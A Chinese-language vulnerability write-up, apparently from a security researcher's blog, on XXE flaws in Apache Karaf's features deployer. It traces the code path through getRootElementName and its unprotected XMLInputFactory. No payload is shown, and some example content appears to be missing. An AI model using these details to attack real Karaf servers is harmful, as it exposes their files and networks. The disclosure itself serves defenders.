Apache Karaf 是一个现代且多态的应用容器。它是一个由 OSGi 提供支持的轻量级、功能强大且企业就绪的容器。Apache Karaf 是一个"产品项目",提供完整且开箱即用的运行时。该运行时是"多面"的,这意味着你可以部署不同类型的应用:OSGi 或非 OSGi、Web 应用、基于服务的应用等。
在最近对 Apache Karaf 的研究中,我发现在其 XML 解析器上存在一些 XXE(XML 外部实体注入)漏洞。该问题是由于解析器未正确解析 XML 文档所致。
根据官方手册,Apache Karaf 默认提供一个 features 部署器,允许用户通过将文件直接放入 deploy 文件夹来"热部署" features XML。
当你在 deploy 文件夹中放入 features XML 时,features 部署器会:
例如,将以下 XML 放入 deploy 文件夹将自动安装 feature1 和 feature2,而 feature3 不会被安装:

为了了解部署器如何处理 XML 文件,我查看了 Github 上的 Karaf 源代码,并发现了如下的调用链:
Activator 类调用 doStart() 函数来为部署器启动一个监听器doStart() 函数调用 FeatureDeploymentListener.init() 来初始化一个监听器bundleChanged - canHandle - getRootElementName 函数,借助 XMLInputFactory 来解析 XML 文档但是,进一步研究下面的 getRootElementName 函数后,发现没有任何针对 XXE 的防护措施。
